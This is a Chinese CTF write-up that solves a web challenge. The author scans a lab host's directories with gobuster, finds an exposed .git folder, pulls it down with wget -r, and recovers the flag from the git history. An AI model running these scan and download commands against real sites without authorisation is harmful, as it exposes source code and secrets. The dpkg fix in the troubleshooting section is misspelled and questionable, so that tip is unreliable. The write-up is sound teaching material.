题目描述
题目截图如下:
进入场景看看:
解题思路
- 看源码,看F12网络请求
- 没有东西只能老老实实按照提示用Linux去扫描目录
相关工具
- kali虚拟机
- 安装gobuster 或者dirsearch
解题步骤
- 先查看源码:
flag{Zmxhz19ub3RfaGvyzSEHIQ==}
看到==,那不得解码一下(得到乱码假的flag?):
2. 老老实实按照提示来使用Linux吧:
- 安装gobuster:
apt install gobuster
安装成功。可能出现一些问题,参考地址:
Failed to fetch http://mirrors.neusoft.edu.cn/kali/pool/main/g/glibc/libc6-i386_2.37-12_amd64.deb
删除代码如下:
sudo dpkg --remove-archecture amd64
- 使用gobuster扫描,发现git泄漏。扫描命令:
gobuster dir -u http://114.67.175.224:10401/ -w /usr/share/wordlists/dirb/common.txt
使用如下代码将目标地址的文件和文件夹递归下载:
wget -r http://114.67.175.224:10401/.git
- 进入git目录,也就是桌面上IP命名的文件夹
- 使用git reflog命令查看执行的命令日志
git reflog
可以看到flag is here?
- 使用git show commit_id 命令查看commit,标黄色的是commit的id
git show commit_id
成功的到flag!
得到Flag
flag{git_is_good_distributed_version_control_system}
新知识点
- gobuster仓库
- kali中安装gobuster
记得要先更新一下:apt update - gobuster简介
Gobuster是在Kali Linux中安装的一款目录/文件和DNS爆破工具。它是使用Go语言编写的命令行工具,具备优异的执行效率和并发性能。该工具支持对子域名和Web目录进行基于字典的暴力扫描。不同于其他工具,该工具支持同时多扩展名破解,适合采用多种后台技术的网站。实施子域名扫描时,该工具支持泛域名扫描,并允许用户强制继续扫描,以应对泛域名解析带来的影响。gobuster常用两种扫描模式,dir模式和dns模式。
- 了解使用dirsearch扫描目录
有用的话,请
点赞收藏评论,帮助更多的同学哦
